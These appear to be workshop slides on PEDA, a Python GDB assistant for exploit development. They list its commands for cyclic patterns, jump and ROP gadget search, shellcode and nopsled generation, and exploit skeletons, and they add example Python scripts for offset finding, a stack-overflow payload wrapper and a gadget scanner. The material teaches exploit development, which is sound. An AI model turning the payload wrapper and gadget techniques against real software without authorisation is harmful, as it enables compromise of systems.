Long Le
longld@vnsecurity.net
Virtual machine
  VMware / VirtualBox
  Ubuntu 10.04 Live CD ISO
  Internet connection (NAT/Bridge)
Required packages
  $ sudo apt-get install nasm micro-inetd
Optional packages
  $ sudo apt-get install libc6-dbg vim ssh
PEDA tool
  Create a ~/.gdbinit that loads PEDA (source peda.py)
Workshop exercises
Python GDB
  Shortcomings of plain GDB for exploit development:
  Lack of intuitive interface
  Lack of smart context display
  Lack of commands for exploit development (ExDev)
  GDB scripting is weak
  Since GDB 7.0: Python GDB, a powerful scripting API (v7.x)
PEDA Introduction
Python Exploit Development Assistance for GDB
  A Python GDB init script
  Requires GDB 7.x with Python support
  Self-help manual
  Auto-completion of commands and options
PEDA ?eatures
Exploit development steps PEDA assists with:
  Occupy EIP
  Find the offset(s)
  Determine the attack vector
  Build the exploit
  Test/debug the exploit
Determine the attack vector (where the payload lives and where control goes):
  stack
  data / heap
  text
  library (libc)
  code chunk (ROP)
  stack pivoting
Build the exploit:
  Payload
  Wrapper
Demo & Practices
  Buffer overflow exploit
  Format string exploit
  PEDA commands: explanation and usage
PEDA /ommands
pattern create
  pattern create 2000
  pattern create 2000 input        (also write the pattern to file "input")
pset arg
  pset arg 'A'*200
  pset arg 'cyclic_pattern(200)'
pset env
  pset env NAME 'cyclic_pattern(200)'   (NAME is the environment variable to set)
Context display
Registers
  context reg
Code
  context code
Stack
  context stack
Runtime info
Register / address
  xinfo register eax
  xinfo 0xb7d88000
Stack / memory
  telescope 40
  telescope 0xb7d88000 40
pattern offset
  pattern offset $pc               (value read from the crashed EIP)
pattern search
  pattern search                   (find pattern fragments in memory and registers)
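Added example, not PEDA's own code: the idea behind pattern create, pattern offset and pattern search implemented stand-alone, so the "Occupy EIP" and "Find the offset(s)" steps can be rehearsed without gdb. It assumes a de Bruijn sequence of order 3 over A-Za-z0-9; PEDA's charset and output differ, so offsets from this script are not interchangeable with PEDA's. The crash values in the __main__ block are constructed.

```python
# Added example (not PEDA's code): stand-alone cyclic pattern tooling.
# Assumption: de Bruijn order 3 over A-Za-z0-9 (PEDA's real charset differs).
import struct

CHARSET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
           "abcdefghijklmnopqrstuvwxyz"
           "0123456789")


def de_bruijn(alphabet, n, maxlen):
    """First `maxlen` symbols of the de Bruijn sequence B(k, n).

    Every n-symbol window is unique, so any 4-byte value found in a
    register maps back to exactly one offset in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if len(out) >= maxlen:            # stop early once we have enough
            return
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= maxlen:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out[:maxlen])


def pattern_create(size):
    """Cyclic pattern of `size` bytes (unique 3-byte windows up to 62**3)."""
    return de_bruijn(CHARSET, 3, size).encode()


def pattern_offset(value, size=20000):
    """Offset of a register value inside the pattern, or None.

    `value` is raw bytes, or an int such as 0x41414241 read from EIP.  An
    int is matched little-endian first (how it sat on the stack), then
    big-endian, which is what you see after a byte-reversed copy."""
    pat = pattern_create(size)
    if isinstance(value, int):
        for fmt in ("<I", ">I"):
            pos = pat.find(struct.pack(fmt, value))
            if pos != -1:
                return pos
        return None
    pos = pat.find(value)
    return None if pos == -1 else pos


def pattern_search(memory, base, size=20000, minlen=4):
    """Maximal runs of the pattern inside a memory snapshot.

    Returns (address, offset_into_pattern, length): this shows where copies
    of the input landed (stack, heap) before choosing the attack vector."""
    pat = pattern_create(size)
    hits = []
    i = 0
    while i + minlen <= len(memory):
        off = pat.find(memory[i:i + minlen])   # 4-byte windows are unique
        if off == -1:
            i += 1
            continue
        j = minlen                             # extend while both sides agree
        while (i + j < len(memory) and off + j < len(pat)
               and memory[i + j] == pat[off + j]):
            j += 1
        hits.append((base + i, off, j))
        i += j
    return hits


if __name__ == "__main__":
    # constructed crash: a 200-byte pattern whose saved EIP sits at offset 112
    pat = pattern_create(200)
    eip = struct.unpack("<I", pat[112:116])[0]
    print("EIP = 0x%08x -> offset %d" % (eip, pattern_offset(eip)))
```

pattern_offset tries the big-endian reading only after the little-endian one fails, mirroring what a crash with a byte-swapped overwrite looks like; a None result means the register value did not come from your input at all.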
Jmp/call search
jmpcall
  jmpcall
  jmpcall eax
  jmpcall esp libc
Generate shellcode/nopsled
gennop
  gennop 500
  gennop 500 \x90
shellcode
  shellcode x86/linux exec
assemble
  assemble
Exploit wrapper
skeleton
  skeleton argv exploit.py
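Added example, not the skeleton that PEDA's `skeleton` command writes (this page does not show its contents): a minimal exploit wrapper that builds the classic "padding | saved EIP | nopsled | shellcode" payload, checks it against the badchars, and launches the target via argv. The offset, return address, shellcode placeholder and target path are constructed values.

```python
# Added example (not PEDA's generated skeleton): a minimal exploit wrapper.
# Offset, return address, shellcode and target are constructed placeholders.
import struct
import subprocess


def p32(value):
    """Little-endian 32-bit pack, the form a saved EIP has on an x86 stack."""
    return struct.pack("<I", value)


def check_badchars(payload, badchars):
    """(index, byte) for every badchar occurrence; an empty list means clean."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


def build_payload(offset, ret_addr, shellcode, nops=16, badchars=b""):
    """Layout: `offset` bytes of filler, the return address (pointing into
    the nopsled), then the sled and the shellcode.

    Raises ValueError if a badchar is present (NUL for argv/strcpy targets,
    \\r\\n for line-based input), since it would truncate or mangle the copy."""
    payload = b"A" * offset + p32(ret_addr) + b"\x90" * nops + shellcode
    bad = check_badchars(payload, badchars)
    if bad:
        raise ValueError("badchars at offsets %s" % [i for i, _ in bad])
    return payload


def run_argv(target, payload):
    """Launch the target with the payload as argv[1] (the `skeleton argv`
    style).  argv can never carry NUL, so it is always a badchar here."""
    if b"\x00" in payload:
        raise ValueError("argv payload cannot contain NUL bytes")
    return subprocess.call([target, payload])


if __name__ == "__main__":
    OFFSET = 112                 # what "pattern offset $pc" would report
    RET = 0xbffff3a0             # constructed stack address inside the sled
    SHELLCODE = b"\xcc" * 4      # int3 placeholder standing in for real shellcode
    payload = build_payload(OFFSET, RET, SHELLCODE, nops=32,
                            badchars=b"\x00\r\n")
    print("payload length:", len(payload))
    # run_argv("./target", payload)   # enable against a real binary
```

The return address is placed before the sled, so the saved EIP must point at a stack address somewhere inside the 0x90 run; with a long sled a small error in the guessed address still lands the execution in the shellcode.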
Memory search
searchmem / find
  find /bin/sh libc
  find 0xdeadbeef all
  find ..\x04\x08 0x08048000 0x08049000
refsearch
  refsearch /bin/sh
  refsearch 0xdeadbeef
lookup address
  lookup address stack libc
lookup pointer
  lookup pointer stack ld-2
asmsearch
  asmsearch 'int 0x80'
  asmsearch 'add esp, ?' libc
ropsearch
  ropsearch 'pop eax'
  ropsearch 'xchg eax, esp' libc
dumprop
  dumprop
  dumprop binary pop
ropgadget
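Added example, not PEDA's code: a stand-alone opcode scanner that does against a saved memory snapshot what jmpcall and ropsearch do against the live process. PEDA disassembles memory; this version matches the fixed x86-32 encodings of the few instructions those searches are after (jmp/call reg, push/pop reg; ret, and the xchg eax, esp; ret pivot). The snapshot and its base address are constructed for the demonstration.

```python
# Added example (not PEDA's code): opcode-pattern gadget scanner for x86-32.
# SNAPSHOT and BASE are constructed; the encodings are the real ones.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def gadget_table():
    """Byte pattern -> text for the gadgets worth finding in a non-ASLR mapping."""
    table = {}
    for r, name in enumerate(REGS):
        table[bytes([0xFF, 0xE0 | r])] = "jmp " + name           # FF /4, mod=11
        table[bytes([0xFF, 0xD0 | r])] = "call " + name          # FF /2, mod=11
        table[bytes([0x50 | r, 0xC3])] = "push %s; ret" % name   # 50+rd, C3
        table[bytes([0x58 | r, 0xC3])] = "pop %s; ret" % name    # 58+rd, C3
    table[b"\x94\xc3"] = "xchg eax, esp; ret"                    # 90+rd (esp), C3
    return table


def scan(memory, base, wanted=None):
    """Sorted (address, text) for every gadget in `memory` mapped at `base`.

    `wanted` filters on a substring of the gadget text, e.g. "esp" or "pop".
    Unaligned hits are reported too: x86 has no instruction alignment, so
    the tail byte of one instruction is a valid start for another."""
    hits = []
    for pattern, text in gadget_table().items():
        if wanted and wanted not in text:
            continue
        start = 0
        while True:
            idx = memory.find(pattern, start)
            if idx == -1:
                break
            hits.append((base + idx, text))
            start = idx + 1
    return sorted(hits)


# constructed snapshot of a text segment with gadgets planted at known spots
BASE = 0x08048000
SNAPSHOT = (
    b"\x55\x89\xe5"          # push ebp; mov ebp, esp: an ordinary prologue
    + b"\x90" * 13
    + b"\xff\xe4"            # jmp esp            at BASE + 0x10
    + b"\x90" * 14
    + b"\x58\xc3"            # pop eax; ret       at BASE + 0x20
    + b"\x90" * 14
    + b"\x94\xc3"            # xchg eax, esp; ret at BASE + 0x30
)

if __name__ == "__main__":
    for addr, text in scan(SNAPSHOT, BASE):
        print("0x%08x : %s" % (addr, text))
```

Feed it the file written by dumpmem for the mapping you care about and its start address from vmmap; the esp filter reproduces the "jmpcall esp" use, the pop filter the "dumprop binary pop" use.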
elfheader / readelf
  elfheader
  elfheader .got
  readelf libc .text
elfsymbol
  elfsymbol
  elfsymbol printf
payload
  payload copybytes
  payload copybytes target /bin/sh
  payload copybytes 0x0804a010 offset
dumpmem
  dumpmem libc.mem libc
loadmem
  loadmem stack.mem 0xbffdf000
cmpmem
  cmpmem 0x08049000 0x0804a000 data.mem
xormem
  xormem 0x08049000 0x0804a000 thekey
patch
  patch $esp 0xdeadbeef
  patch $eax "the long string pattern"
  patch 0xdeadbeef 100
  patch (multiple lines)
strings
  strings
  strings binary 4
hexdump
  hexdump $sp 64               (64 bytes)
  hexdump $sp /20              (20 lines of 16 bytes)
hexprint
  hexprint $sp 64
  hexprint $sp /20
pdisass
  pdisass $pc /20
nearpc
  nearpc 20
  nearpc 0x08048484
pltbreak
  pltbreak cpy
deactive
  deactive setresuid
  deactive chdir
unptrace
  unptrace
stepuntil
  stepuntil cmp
  stepuntil xor
  nextcall cpy
  nextjmp
tracecall / ftrace
  tracecall
  tracecall cpy,printf
  tracecall -puts,fflush
traceinst / itrace
  traceinst 20
  traceinst cmp,xor
waitfor
  waitfor
  waitfor myprog -c
snapshot
  snapshot save
  snapshot restore
assemble
  assemble $pc
    mov al, 0xb
    int 0x80
    end
procinfo
  procinfo
  procinfo fd
Config options
pshow
  pshow
  pshow option context
pset option
  pset option context code,stack
  pset option badchars \r\n
Global instances
pedacmd:
  Interactive commands
  Return nothing
  e.g. pedacmd.context_register()
peda:
  Backend functions that interact with GDB
  Return values
  e.g. peda.getreg("eax")
Utilities
Getting help
  pyhelp peda
  pyhelp hex2str
External scripts
  # myscript.py: sourced inside gdb, so the peda instance and PEDA's
  # utility functions (cyclic_pattern, ...) are already in scope
  def myrun(size):
      argv = cyclic_pattern(size)
      peda.execute("set arg %s" % argv)
      peda.execute("run")

  gdb-peda$ source myscript.py
  gdb-peda$ python myrun(100)
PEDA structure
PEDA class
  Interact with GDB
  Backend functions
  Interactive commands
  Config options
  Common utils
  External libraries
PEDACmd class
  Utilities
  Special functions
Future plan
Thank you!